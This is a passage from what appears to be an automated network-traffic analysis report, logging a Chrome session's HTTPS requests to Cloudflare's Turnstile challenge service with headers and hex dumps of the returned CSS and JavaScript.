                            2024-08-13 19:57:35 UTC1369INData Raw: 6b 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 76 69 73 69 74 65 64 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 6c 69 6e 6b 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 62 62 62 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 68 6f 76 65 72 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 61 63 74 69 76 65 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 66 6f 63 75 73 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72
                            Data Ascii: k,.theme-dark #challenge-error-text a:visited,.theme-dark #challenge-error-text a:link { color: #bbb;}.theme-dark #challenge-overlay a:hover, .theme-dark #challenge-overlay a:active, .theme-dark #challenge-overlay a:focus,.theme-dark #challenge-err
                            2024-08-13 19:57:35 UTC1369INData Raw: 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 74 65 72 6d 73 20 61 3a 66 6f 63 75 73 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 39 34 39 34 39 34 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 6f 6e 74 65 6e 74 20 7b 0a 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 39 37 39 37 39 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 33 32 33 32 33 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 71 72 20 7b 0a 20 20 66 69 6c 6c 3a 20 72 67 62 28 32 34 33 2c 20 31 32 38 2c 20 33 32 29 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 20 7b 0a 20 20 66 69 6c 6c 3a 20 23 66 66 66 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 20 7b 0a 20 20 63 6f
                            Data Ascii: .theme-dark #terms a:focus { color: #949494;}.theme-dark #content { border-color: #797979; background-color: #232323;}.theme-dark #qr { fill: rgb(243, 128, 32);}.theme-dark .logo-text { fill: #fff;}.theme-dark #fr-helper-loop-link { co
                            2024-08-13 19:57:35 UTC1369INData Raw: 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 66 66 61 32 39 39 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 20 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 66 66 61 32 39 39 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 20 61 3a 6c 69 6e 6b 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 20 61 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 66 66 61 32 39 39 3b 0a 7d 0a 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 7b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 74 6f 70 3a 20 30 3b 0a 20 20 7a 2d
                            Data Ascii: }.theme-dark .error-message { color: #ffa299;}.theme-dark .error-message a { color: #ffa299;}.theme-dark .error-message a:link, .theme-dark .error-message a:visited { color: #ffa299;}#challenge-overlay { position: absolute; top: 0; z-
                            2024-08-13 19:57:35 UTC1369INData Raw: 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 20 20 77 69 64 74 68 3a 20 32 34 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 61 63 74 69 76 65 20 7e 20 2e 63 62 2d 69 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 63 34 34 64 30 65 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 20 7e 20 2e 63 62 2d 69 20 7b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 20 73 63 61 6c 65 28 31 29 3b 0a 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 70 78 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b
                            Data Ascii: margin: 0; cursor: pointer; width: 24px; height: 24px;}.cb-lb input:active ~ .cb-i { border: 2px solid #c44d0e;}.cb-lb input:checked ~ .cb-i { transform: rotate(0deg) scale(1); opacity: 1; border-radius: 5px; background-color: white;
                            2024-08-13 19:57:35 UTC1369INData Raw: 61 6e 64 69 6e 67 20 7b 0a 20 20 66 6c 65 78 2d 66 6c 6f 77 3a 20 72 6f 77 2d 72 65 76 65 72 73 65 20 77 72 61 70 3b 0a 20 20 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 20 66 6c 65 78 2d 73 74 61 72 74 3b 0a 20 20 61 6c 69 67 6e 2d 73 65 6c 66 3a 20 66 6c 65 78 2d 65 6e 64 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 32 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 65 72 6d 73 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 71 72 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 73 69 7a
                            Data Ascii: anding { flex-flow: row-reverse wrap; place-content: center flex-start; align-self: flex-end; margin: 0 12px; padding-right: 0; text-align: right;}.size-compact #terms { text-align: right;}.size-compact #qr { text-align: center;}.siz


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            9192.168.2.649729104.18.94.414432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:57:35 UTC383OUTGET /turnstile/v0/b/cc21665cd7b9/api.js HTTP/1.1
                            Host: challenges.cloudflare.com
                            Connection: keep-alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: */*
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-08-13 19:57:35 UTC471INHTTP/1.1 200 OK
                            Date: Tue, 13 Aug 2024 19:57:35 GMT
                            Content-Type: application/javascript; charset=UTF-8
                            Content-Length: 45035
                            Connection: close
                            accept-ranges: bytes
                            last-modified: Fri, 09 Aug 2024 15:21:28 GMT
                            cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                            access-control-allow-origin: *
                            cross-origin-resource-policy: cross-origin
                            Server: cloudflare
                            CF-RAY: 8b2b466b2b667ced-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-08-13 19:57:35 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 53 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 5f 3d 65 5b 75 5d 28 67 29 2c 70 3d 5f 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 66 29 7b 61 28 66 29 3b 72 65 74 75 72 6e 7d 5f 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 4f 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74
                            Data Ascii: "use strict";(function(){function St(e,r,a,o,c,u,g){try{var _=e[u](g),p=_.value}catch(f){a(f);return}_.done?r(p):Promise.resolve(p).then(o,c)}function Ot(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var u=e.apply(r,a);funct
                            2024-08-13 19:57:35 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 5f 72 28 65 2c 72 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 24 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                            Data Ascii: e}function _r(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function $e(e,r){return r=r!=nu
                            2024-08-13 19:57:35 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 4a 65 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 62 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 43 74 28 65 29 7c 7c 4e 74 28 65 2c 72 29 7c 7c 4c 74 28 65 2c 72 29 7c 7c 6b 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 4e 65 28 65 2c 72 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                            Data Ascii: ray$/.test(a))return Je(e,r)}}function be(e,r){return Ct(e)||Nt(e,r)||Lt(e,r)||kt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ne(e,r){var a={label:0,sent:function(){if(u[0
                            2024-08-13 19:57:35 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 46 74 3d 33 30 30 30 32 30 3b 76 61 72 20 6b 65 3d 33 30 30 30 33 30 3b 76 61 72 20 4c 65 3d 33 30 30 30 33 31 3b 76 61 72 20 42 3b 28 66 75
                            Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Ft=300020;var ke=300030;var Le=300031;var B;(fu
                            2024-08-13 19:57:35 UTC1369INData Raw: 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 75 65 7c 7c 28 75 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 45 4e 44 45 52 3d 22 72 65 6e 64 65 72 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29 28 70 65 7c 7c 28 70 65 3d 7b 7d 29 29 3b 76 61 72 20 6c 65 3b 28 66 75 6e
                            Data Ascii: e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ue||(ue={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(function(e){e.RENDER="render",e.EXECUTE="execute"})(pe||(pe={}));var le;(fun
                            2024-08-13 19:57:35 UTC1369INData Raw: 76 61 72 20 59 3d 22 30 2f 30 22 3b 66 75 6e 63 74 69 6f 6e 20 66 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64
                            Data Ascii: var Y="0/0";function ft(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="d
                            2024-08-13 19:57:35 UTC1369INData Raw: 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 63 2c 75 3d 4c 28 78 72 2c 28 63 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 63 21 3d 3d 76 6f 69 64 20 30 3f 63 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 67 2c 5f 3d 4c 28 77 72 2c 28 67 3d 28 61 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 61 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 67 21 3d 3d 76 6f 69 64 20 30 3f 67 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 3b 72 65 74 75 72 6e 20 6f 26 26 75 3f 22
                            Data Ascii: HAVING_TROUBLES,c,u=L(xr,(c=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&c!==void 0?c:"nonexistent"),g,_=L(wr,(g=(a=e.displayLanguage)===null||a===void 0?void 0:a.toLowerCase())!==null&&g!==void 0?g:"nonexistent");return o&&u?"
                            2024-08-13 19:57:35 UTC1369INData Raw: 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 61 29 7d 2c 73 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 5a 74 28 65 29 7b 72 65 74 75 72 6e 20 46 75 6e 63 74 69 6f 6e 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 69 6e 64 65 78 4f 66 28 22 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 22 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 50 65 28 65 29 7b 76 61 72 20 72 3d 74 79 70 65 6f 66 20 4d 61 70 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 6e 65 77 20 4d 61 70 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 50 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 5a 74 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29
                            Data Ascii: __proto__||Object.getPrototypeOf(a)},se(e)}function Zt(e){return Function.toString.call(e).indexOf("[native code]")!==-1}function Pe(e){var r=typeof Map=="function"?new Map:void 0;return Pe=function(o){if(o===null||!Zt(o))return o;if(typeof o!="function")
                            2024-08-13 19:57:35 UTC1369INData Raw: 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 72 2e 73 72 63 29 29 72 65 74 75 72 6e 20 72 3b 66 6f 72 28 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 73 63 72 69 70 74 22 29 2c 6f 3d 30 2c 63 3b 63 3d 61 5b 6f 5d 3b 6f 2b 2b 29 69 66 28 50 28 63 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 63 2e 73 72 63 29 29 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 61 72 28 29 7b 76 61 72 20 65 3d 67 74 28 29 3b 65 7c 7c 76 28 22 43 6f 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34
                            Data Ascii: riptElement)&&e.test(r.src))return r;for(var a=document.querySelectorAll("script"),o=0,c;c=a[o];o++)if(P(c,HTMLScriptElement)&&e.test(c.src))return c}function ar(){var e=gt();e||v("Could not find Turnstile script tag, some features may not be available",4
                            2024-08-13 19:57:35 UTC1369INData Raw: 28 22 61 6c 6c 6f 77 22 2c 22 63 72 6f 73 73 2d 6f 72 69 67 69 6e 2d 69 73 6f 6c 61 74 65 64 3b 20 66 75 6c 6c 73 63 72 65 65 6e 22 29 2c 66 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 61 6e 64 62 6f 78 22 2c 22 61 6c 6c 6f 77 2d 73 61 6d 65 2d 6f 72 69 67 69 6e 20 61 6c 6c 6f 77 2d 73 63 72 69 70 74 73 20 61 6c 6c 6f 77 2d 70 6f 70 75 70 73 20 61 6c 6c 6f 77 2d 66 6f 72 6d 73 22 29 2c 66 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 63 72 6f 6c 6c 69 6e 67 22 2c 22 6e 6f 22 29 2c 66 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 57 69 64 74 68 3d 22 30 70 78 22 2c 66 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 25 22 2c 66 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 25 22 2c 66 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 3d 22 68 69 64 64
                            Data Ascii: ("allow","cross-origin-isolated; fullscreen"),f.setAttribute("sandbox","allow-same-origin allow-scripts allow-popups allow-forms"),f.setAttribute("scrolling","no"),f.style.borderWidth="0px",f.style.width="100%",f.style.height="100%",f.style.overflow="hidd


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            10192.168.2.649730104.18.95.414432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:57:36 UTC730OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8b2b466a48c34405&lang=auto HTTP/1.1
                            Host: challenges.cloudflare.com
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: */*
                            Sec-Fetch-Site: same-origin
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: script
                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/0rq59/0x4AAAAAAAhE9zkCiN0ETgsg/auto/fbE/normal/auto/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-08-13 19:57:36 UTC331INHTTP/1.1 200 OK
                            Date: Tue, 13 Aug 2024 19:57:36 GMT
                            Content-Type: application/javascript; charset=UTF-8
                            Content-Length: 116953
                            Connection: close
                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                            Server: cloudflare
                            CF-RAY: 8b2b46706a254309-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-08-13 19:57:36 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 65 61 67 6e 30 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70
                            Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.eagn0={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"http
                            2024-08-13 19:57:36 UTC1369INData Raw: 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 65 6e 64 25 32 30 46 65 65 64 62 61 63 6b 22 2c 22 69 6e 76 61 6c 69 64 5f 73 69 74 65 6b 65 79 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 73 69 74 65 6b 65 79 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 70 72 69 76 61 63 79 22 3a 22 50 72 69 76 61 63 79 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 65 78 70 69 72 65 64 22 3a 22 45 78 70
                            Data Ascii: 0more%20information%3C%2Fa%3E","turnstile_feedback_description":"Send%20Feedback","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_footer_privacy":"Privacy","turnstile_expired":"Exp
                            2024-08-13 19:57:36 UTC1369INData Raw: 72 73 65 49 6e 74 28 67 48 28 31 36 32 32 29 29 2f 31 30 2c 66 3d 3d 3d 64 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 33 32 36 32 31 34 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 39 39 33 29 5d 2c 65 4d 5b 67 49 28 38 37 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 4a 2c 63 2c 64 2c 65 29 7b 67 4a 3d 67 49 2c 63 3d 7b 27 70 6c 73 63 75 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 28 67 29 7d 2c 27 76 79 78 73 79 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 67 3d 3d 3d 66 7d 2c 27 64 77 44 59 43 27 3a 67 4a 28 31 30 38 39 29 2c 27 77 68 6e
                            Data Ascii: rseInt(gH(1622))/10,f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,326214),eM=this||self,eN=eM[gI(993)],eM[gI(872)]=function(gJ,c,d,e){gJ=gI,c={'plscu':function(f,g){return f(g)},'vyxsy':function(f,g){return g===f},'dwDYC':gJ(1089),'whn
